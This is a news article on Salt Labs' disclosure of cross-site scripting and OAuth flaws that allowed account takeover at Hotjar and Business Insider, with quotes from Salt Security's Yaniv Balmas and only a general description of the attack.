Security researchers have unveiled critical vulnerabilities within web analytics provider Hotjar and global news outlet Business Insider.
The findings, from Salt Labs, indicate heightened risks for enterprises. Hotjar, used alongside Google Analytics, gathers extensive personal and sensitive data, including user screen activity, PII, private messages and even credentials in some instances.
Potential Impact on Major Brands
Serving over a million websites, including major brands like Adobe, Microsoft, T-Mobile and Nintendo, these vulnerabilities could have potentially granted attackers unlimited access to sensitive data, impacting millions of users and organizations worldwide.
These vulnerabilities are not confined to Hotjar and Business Insider but suggest a broader issue within similar ecosystems. The research, published today, emphasizes the persistence of cross-site scripting (XSS) vulnerabilities, a problem since the early days of the internet. Although mitigated over time, the integration of new technologies has reintroduced these historical flaws, significantly escalating security risks.
Combining XSS With OAuth For Severe Breaches
Salt Labs’ research highlights how XSS combined with OAuth, the prevalent authorization and authentication protocol, can lead to severe breaches. OAuth is widely used, often unknowingly, by thousands of web services, especially those offering social login functions. By exploiting these vulnerabilities, researchers demonstrated the ability to take over Hotjar and Business Insider accounts.
“The risk associated with these types of attacks very naturally depends on the type of target, what information they store, what functionality they provide, etc.,” explained Yaniv Balmas, vice president of research at Salt Security.
“You can generally say that an attacker who successfully exploits this attack vector will gain the same permissions and functionality as the victim, and therefore, the risk will be parallel to what can actually be done by a normal system user.”
Exploitation Method
To exploit this vulnerability, an attacker typically sends a legitimate-looking link via email, text or social media, tricking victims into clicking it. Once clicked, the attacker gains full control of the account, enabling them to perform any actions and access all stored data.
This issue is not isolated to the two analyzed targets. Given OAuth’s popularity and the prevalence of XSS issues, many other web services are likely to be vulnerable. This underscores the inherent risks associated with bundled API usage.
“As always, when implementing any new technology, many things need to be considered, including, of course, security,” Balmas added. “A solid implementation that considers all possible options should be secure and will not allow an attacker an opportunity to abuse this attack vector.”
The new data comes months after Salt Security revealed critical OAuth vulnerabilities in the AI tool ChatGPT.